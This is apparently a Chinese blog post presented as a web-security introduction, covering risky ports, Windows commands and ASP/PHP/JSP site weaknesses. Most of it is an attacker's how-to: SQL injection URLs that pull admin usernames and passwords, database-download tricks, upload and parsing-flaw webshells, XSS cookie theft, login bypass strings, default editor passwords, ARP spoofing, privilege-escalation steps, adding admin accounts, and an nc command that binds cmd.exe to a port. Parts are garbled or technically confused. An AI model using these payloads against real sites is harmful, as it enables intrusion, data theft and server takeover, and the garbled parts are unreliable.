今天有时间给大家写这么一篇文章    

 1,  阅读此安全文献能够增进对网络安全的认识，开阔自己的视野，并对WEB安全应用层有一定的了解 。

 2，系列章节主要包括WEB常见攻击手段，WEB网站架构漏洞分析，WEB服务器架构分析等，以此对应用层的安全有一定认知，也利于自身防范架设的服务器安全。

 

   开场白： 没有绝对安全的电脑，没有绝对安全的服务器，越化作一阵风，去鸣听这段久违的梦。


   1章    内容：端口 命令


1，端口，这个很让人理解的字眼，电脑的端口一共有65535个，但实际用到的却只有几十个，常见的端口

3389，4899，135，445，5900，1433，3306，1521，21，80，23，25，53等等，端口就像一座房子的烟囱一样，如果打开了，就可能会面临着一些风险，如3389，这是远程桌面的端口，他主要用于两个方面，一是实现网络交互的过程，一台电脑连接到另外一台电脑的桌面，第二个方面就是被黑客的提权利用，命令是MSTSC，而3389端口入侵正是实现了这样的功能，而3389针对的是WINXP的系统空密码，也就是说，XP系统的用户如果密码为空，3389端口也打开的情况下，如果被黑客扫描到，那么就可以远程被利用，黑客通过IP地址，远程连接，并在窗口输入administrators, 密码为空，直接确定，就可以看到对方的桌面了，但3389有个弊端，如果对方发现，移动了鼠标，那么远程桌面将关闭。而空密码与空连接就是不同的方式了，空连接是IPC空连接 ，利用格式为：net use \\ip\ipc$ "" /user:"admin", 意思就是密码都空的时候对目标地址进行空连接，如果成功，那么就可以实现一个映射的功能 net use z: \\ip\c$,这就是远程映射的功能，把目标服务器的C盘映射为本地的Z盘，对方的盘符，我们在本地的Z盘可以访问对方C的内容了。开启3389服务器就是在系统设置里的远程，允许用户远程连接打勾就可以了。

  4899，4899端口其实跟3389的模式是差不多的，而4899是通过RAMIN影子服务端进行连接，4899通常是针对空密码的用户，如果漏洞存在，可以通过影子服务端远程连接，实现远程控制的功能。

  135，135端口准确的说他是一个溢出端口，如果在网吧，我们可以使用命令 NETSTAT －AN ，这个命令是查看开放了哪些端口，而一般情况下，网吧都开放了135与445端口，而不怀好意的人就会使用远程控制软件生成木马，内网映射成功后，就可以批量的进行传马到其他机器，这样很多电脑都因此成为了肉鸡

  5900，5900端口一般针对国外服务器，攻击者可以使用VNC连接器对5900国外服务器进行批量检测，这个方式要用到VPN代理技术，而扫描方式通常会选择SYN，省去了TCP延时的问题

  1433，想必大家对1433这个端口很熟悉，没错，他是SQL SERVER的端口，而1433通常去寻找SA的弱口令进行检测，1433连接工具就发挥了这个作用，利用者通过得到的密码文件，输入用户名与密码以及数据库的名字，远程连接对方的数据库，接着执行SQL提权命令，成功达到服务器侵入的目的。

  3306， MYSQL的端口，漏洞存放目录一般为conn.asp config.php common.inc.php 里面存在网站的根目录下，利用者得到了此数据，一般有两个方向，1，MYSQL脱库，2，MYSQL提权 ，MYSQL脱库是针对的论坛服务器，会员数据，利用MYSQL远程连接数据库，一般是找到SELECT ＊ FROM MEMBERS表的位置，然后导出文件SQL到本地，里面存放的就是会员的详细数据了。而MYSQL提权就是提升权限，需要导注册表的DLL文件，然后执行SQL命令增加一个管理组，而一般MYSQL数据库大于5.0时，导出就必须是安装目录了，小于5，0的话可以导出到 ：c:/windows/udf.dll，因为后期版本官方也做了一些限制！

  命令也是同样重要的，如WIN与LINUX的系统命令，MS－DOS环境下的命令，大概的命令要记住

  WIN:  NET USER ADD ADD /ADD NET LOCALGROUP ADMINISTRATORS ADD /ADD 加入管理组帐号

  WMIC PROCESS 查看当前系统进程详细路径

  ARP －A 查看当前的系统MAC地址

  TRACERT －D 追踪路由  

  PING  测试命令

  systeminfo 查看系统配置信息

  md ren rd 新建目录，目录改名，删除目录

  NETSTAT －V 正在进行的工作 －A 查看当前监听的端口 －N 正在进行的连接  －AN 查看开放了哪些端口

   AT 计划任务


   二章      内容： WEB脚本安全

  WEB脚本安全，也是网络安全的一个重中之重，如何认识脚本安全呢?

  首先我们得对网站的类型与架构要有所了解，如ASP网站，PHP网站，JSP网站，ASPX网站，CGI等等

  一般安全性通常为：ASP－－>PHP-->ASPX-->JSP--<

  可以看出，ASP的安全性是最低的，我们都知道一个网站的程序是程序员设计的，那么程序设计中

  有可能会出现漏洞，一旦有漏洞，就会被一些人成功利用，这就是WEB脚本安全，学习脚本安全对于

  自身对WEB安全有一定认识，并熟练掌握WEB攻防相关技术。

 

  服务器管理员把网站架设到外网，实现了多人访问的目的，那么服务器是开着，既然有外部网络通讯这一功能

，那么脚本安全就诞生了，一个技术诞生也意味着另外一个技术的衍生，比如汇编，反汇编，同样的道理，利用者通过

外部网站所架设的虚拟站点进行逐一检测，最终发现漏洞。

 

  原理：通过程序设计漏洞远程写入脚本木马到服务器网站根目录下，接着连接外部路径地址，形成网络后门。

  优点：服务器单向渗透并指于异常困难，而脚本安全就取而代之了，通过脚本得到SHELL的权限后再去执行服务器提升这样一个途径。

 ASP 网站漏洞分析：

 

 一般ASP的网站 应用于小型公司企业所需求

 常见漏洞：SQL注入 ，爆库，目录遍历，越权访问，上传，弱密，社会工程学，XSS , 编辑器, COOKIE, OR，FTP，穷举

 SQL漏洞原因：变量过滤不严，

 爆库是由于没有写容错代码

 注入测试方法：AND 1＝1 AND 1＝2  前提是动态网站，而非静态

 在网站上打开一个新闻的动态页面，然后打一‘提交

 http://www.baidu.com/asp/asp?id=30%20and%201=1  正常

 http://www.baidu.com/asp/asp?id=30%20and%201=2  错误

 存在注入 ，工具注入，以及手工注入都是可以的

 需要进行猜表，表名，列名，以及用户，最后获得密码

 密码一般都是16进制加密，需要到专门的MD5网站进行解密

 爆库，一般分为两种，一种是CONN爆库  %5C爆库  %23爆库

 CONN爆库是由于管理员没有阻止外部人员对此文件的访问

 导致可以访问：http://www.adminx.com/admin/conn.asp  如果报错一定会出现数据库的具体路径

               http://www.adminx.com/inc/config.asp  一般是禁止的

               http://www.adminx.com/inc/conn.asp  一般为空白

  ％5C是二级目录的爆库方式

 格式为：http://www.admin.com/asp/uid?id=1   正常页面

         http://www.admin.com/asp/%5cuid?id=1  如果成功会"弹出数据库下载"

 

 ％23是针对数据库爆库

 我们知道，数据库的表达格式是www.xxx.com/data  www.xxx.com/data   www.xxx.com/datas

 通常这些都是403禁止的，假如我们如果知道数据库的真实下载地址

 表达式：http://www.xxx.com/data s/#xin_wenku.mdb   访问后会显示禁止页面

         http://www.xxx.com/data s/%23xin_wenku.mdb  访问后会弹出MDB数据库下载

 

 目录遍历就是管理员对网站根目录下的子目录权限访问没有做限制

导致利用者可以访问到这些目录，从而对下一步收集信息作为必要条件

 表达式：http:www.xxx.com/manage/../ 目录遍历，可以看到很多目录

  越权访问，就是管理员对目录文件下的后台操作文件页面的权限没做限制，导致利用者可以以匿名的方式访问

到系统后台的内容，这样是很危险的，利用者有时候四俩薄千金就侵入了一个站点

  表达式：http://www.xxx.com/manage/asp/edit.moneyasp?id=#  

  可能出现的页面： 新闻发布页面，管理员添加页面，会员列表页面，网站布局页面等

  上传漏洞 ，也就是网站的图片上传点，有的上传地址很隐秘，本来是用来用户组上传图片，或者头像，或者是公司的PDF，XLS，DOC文件用的，但有的人却用来利用

常见的上传漏洞页面有很多 ，方法有：GIF89A  图片木马伪装， 一句话漏洞 ，IIS解析

 

  表达式：http://www.xxx.com/include/upload.jsp      http://www.com/include_admin/upload.asp     http://www.com/upload_class.asp

 

例如利用者把上传页面的源码保存到本地记事本，然后在第一行写入GIF89A，再进行图片提交

或者使用一句话木马的方式合并到图片中，上传 比如之前早期的NGINX漏洞就是利用的IIS双向解析功能实现

表达式：http://www.xxx.com/php/ass/1.jpg/先访问这个图片地址 ，如果能正常显示，再合访问0x.php  

        http://www.xxx.com/php/ass/1.jpg/0x.php 会出现空白，你会发现什么也没有，其实是后门成功了！

通过一句话木马PHP客户端连接，输入密码就可以上传脚本木马到网站根目录获得WEBSHELL的权限

解析表达式：1.asp;.jpg 1.jpg.asp  2.asa;.gif  0x;x.jpg;0x;y.jpg

意思就是末尾虽然是图片的格式，但他会通过ASP，ASA这样的方式去执行这个图片，其实相当于执行了我们的脚本木马了！

 

 弱密码，有的网站，管理员一般把密码设置得过于简单化，如123，456，123456 ADMIN ADMIN888 ADMIN123 这样的密码很可能被黑客攻破

导致网站的安全性受到威胁！


社会工程学，这个是相当强大的一门技术，他需要掌握与洞察它人的心理状态，其实意为'心理破解者"，如破解一个邮箱，他需要先收集这个主人一切可利用的资料，通过分析，分析这个人的日常状态，日常习惯，等等最后破译密码！很多书店也有卖这样的书籍，价格一般都在30－40元左右！


XSS, 一般分别XSS跨站攻击，以及XSS盲打  它是一种被动式攻击

 基本表达式：< >alert("1")</ >   弹出消息对话框：1

           < >alert(document.cookie)</ >  弹出COOKIE值

          < >window.open("http://baidu.com")</ >  打开百度网站


 跨站表达式：www.xxx.com/asp/asp?id=">< >alert("0")</ >

 挂马跨站表达式 www.xxx.com/asp/asp?id=< src="url">0x</ > 需要把他转换为HEX格式

 框架嵌入动态表达式：www.xxx.com/asp/asp?id=< src="url">0x</ ><marquee>hello</marquee>


 而盲打技术，是针对自己写一个JS代码 ，通过留言页面，管理员一般会审核这样的信息，当他点击后，COOKIE就被自动保存到我们的后门中

 表达式:http://www.xxx.com/cookie/cookie.asp

 

 编辑器漏洞，应该有出现的时间很早 ，一般分为EWEB与FCKEDITOR 漏洞

 编辑器后台一般为 ewebeditor/admin_login.asp

ewebeditor/ewebeditor.aspx ewebeditor/ewebeditor.htm ewebeditor/ewebeditor.asp?id=1  ewebeditor/admin_style.asp

ewebeditor/admin/db/#ewebeditor.mdb ,ewebeditor/db/#ewebedior1033.mdb

 密码一般为 ADMIN888 ADMIN  ADMIN999

 

 FCKEDITOR 编辑器的漏洞

 

 利用的方式也很多

  PHP CMS 就可以利用编辑器上传获得权限

 HTTP://WWW.XXX.COM/ADMIN/FCKEDITOR/../.../../

 COOKIS中转，这个漏洞的形成是因为我们在SQL注入失败的情况下，所采取的另外一种注入方式，简称COOKIE注入

 准备工具：小旋风ASP环境 ，注入，猜表工具

 首先将环境端口设置为82或者81

 接着找一个页面生成127页面

 对比表达式：http://www.xxx.com/asp/aasp?id=1   注入失败

             http://127.0.0.1:81/ROOT地址/POST提交值   可以注入

  OR漏洞 ，熟知的 'or'='or'  漏洞

  针对一些ASP公司网站的后台管理系统，用户密码均输入'or'='or'

  如果成功，可以直接进入后台

  USER：‘OR’＝‘OR’

  NAME： ‘OR’＝‘OR’

 

  FTP的漏洞一般出现于2个特点  ： 匿名访问 ，弱密码

  表达式：ftp://www.xxx.com 匿名访问，直接进入

  弱密码：ftp:www.cc.com user:ftp pass:ftp@ftp.net 输入密码后进入

  如在FTP里放入一个TXT ，内容写为1

  那么访问时，也可以 http:wwww.cc.com/1.txt

  穷举法针对系统爆破工程 ，一般分别DIC文件字典的爆破方式，收集很多现成的字典，对某个邮箱，或者某个QQ的密码或者某个网站的后台，

 进行指定破解，时间耗费很长！

  php 网站漏洞分析

 

  一般漏洞首先就是注入了，

  表示式:http://www.ccc.com/asp/php?id=10%20order%20by%201  猜字段

        http://www.ccc.com/asp/php?id=10%20order%20by%2018  正常

        http://www.ccc.com/asp/php?id=10%20order%20by%2020  错误

 可以判断字段19个，依次拼写19个字段在地址中 ，3个常用变量，data () version user()

3个函数转换要知道 ，c:/win.ini  load_file(), 注射时还可以使用HEX（MID函数进行读路径）

路径表达式：d:/wwwroot/php/uc/config.php

  表达式：http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19  页面显示正常既为成功

      http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin 如果错误页面找不到

    http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user 页面正常既为找到，一般会显示出几个数字，如3，6，8，等字样，我们一般就取3与6

http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user   查看用户: root@localhost
http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user 查看数据库的版本，大于5，0可以爆库

 http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,databse(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user  查看数据库的名字

http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,user,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user  页面正常既为猜到用户与密码，反之会返回错误404

http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,load_file(读取INI地址),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user

http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,HEX(MID),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user

 

还有就是一些系统源码的ODAY，比如动网论坛，动易，老Y文章系统，动科，风讯，DEDECMS织梦，帝国CMS

等等，一般遇到这类的漏洞，有的是EXP注射，有的则需要GET SHELL，自己搭建好PHP环境，接着在DOS窗口里输入命令执行相关漏洞，如开源工具MSF ，就是集成的溢出平台，需要哪个直接通过命令调用就可以了 命令为：show exploits


除此之外，还有PHP文件包含漏洞

表达格式：http://www.a.com/asp/id=http://www.b.com/1.php

也就是说在A点取得的权限，通过源码系统，之间到B点进行读取，这样的话，B点就被利用了，我们就这样获得了B的权限

但前提是在A点先取得权限！

包括ASPX，出现的有时候会出现一个CER表单漏洞，或者是万能密码漏洞


  JSP 漏洞分析


 JSP一般用于，银行，新闻门户站，安全性在外人看来相对较高，但JSP安全性虽然最高，但要说明的是，在提权技术里，JSP权限却是最大的，而相对于不太安全的ASP网站，ASP匿名的权限却降低了！MYSQL有时候也会出现降权！

 

 漏洞一般存在于JS校检未过滤

 导致上传

 二级域名上传漏洞

 表达式：http:www.xx.gov.cn  http://ad.xx.gov.cn/upload.asp    http://svx.xx.gov.com/upload.php

 <form>

 <form action="sadd.jsp" method="post"><br/>

 <input type="file" ><br/>

 <input type="submit" value="go!">

  </form>

  后台管理权限技术

  假如我们通过一个很简单的密码测试进入了自己搭建的网站后台，这时候我们需要获得WEBSHELL权限的时候，就可以通过各种途径了，方法有很多

 例如数据库备份，抓包改包，搭建地址两次上传，解析，直接上传，等等

  允许的格式：gif,bmp,jpg

  禁止的格式：cer,asp,php,jsp,aspx

  旁注漏洞的诞生，也就是网站服务器上，捆绑了很多域名，有购物网，人才网，新闻网，我们目标是新闻网，而新闻网通过测试并未发现很多漏洞，这时候我们就可以人才网入手，去检测，最终通过跨目录，或者ASPX IIS 权限读写的方式获得新闻网的权限


  C段，也就是可以IP地址来表示 ，一个IP段 210.44.123.1-219.44.123.255 之间的255台机器，比如，利用者的目标是210，44，123，5这个地址

这时候我们只需要在这个段里检测成功一台服务器后，在服务器里执行嗅探，如果对方目标未装防火墙，则会被嗅探到，这就是服务器分离状态下的利用方式


表达式： a : 》   b:  》

 

    -- a  目标服务器

    b++   在B段里找一台同网段的服务器

    b++ =a  最终嗅到数据，最后指向目标A

 

 而劫持，与欺骗，都是在cain 与NET FUCER里面完成的

 劫持，一般分为域名劫持，以及ARP劫持

 一般是在同网段服务器里与C段一样的方式，但不同的是，他运用的是劫持

 也就是发送欺骗流量包给目标服务器，服务器被欺骗后主页文件就自动被改成我们想要的内容了。

 而欺骗，一般是ARP，或者是DNS欺骗，ARP欺骗主要是欺骗目标机器的3389 HOST文件，文本格式

 利用C32反汇编工具打开可以清楚的看到在地址的后边，用户与密码就泄露了

  服务器提权技术

  在自行搭建的SHELL网站里，如果不会提权，那么就无法进行下一步

  所以我们需要学习提权技术

  而提权技术一般分别  WIN LINUX提权

  常用工具：巴西烤肉 ，PR大杀器 ，NC监听，LCX转发 ，WIN2003内核溢出 ，IIS6，0， MS，EXE ，SHIFT后门

  提权的步骤

  1，检查网站的权限，如ASP匿名权限 ，是否支持ASPX

  2，检查WC组件是否支持

  3，一般来说，回收站与TEMP目录权限是比较大的

  4，检查CONFIG，ASP，CONN。ASP相关密码

  5，检查FXP 传输工具的文件

  5，检查是否安装PCANYWHERE

  6，是否安装SERTU FTP服务器

  7，检查3389端口是否开启

  8，检查目录文件程序是否可以替换

  9，检查RAMIN密码是否存在

  10，检查检查是否支持JSP权限

  这是外网的方式，而遇到内网的时候，则需要转发 ，首先得本地监听，再转发到3389，利用本地127地址：监听端口去连接对方3389

NC反弹命令： C:/winodws/nc.exe -l -p 5858 -t -e c:/windows/cmd.exe  
还有一个就是SHELL CODE ，牛人的道路从这里启航！
一个真正懂安全的人，
会说自己是最有安全感！
一个真正不懂安全的人，
会说自己没有安全可言！

 
                                                                       好了就写到这里，希望大家喜欢这篇文章！

                                                                              多多支持， 明天会更好！
QQ:466196038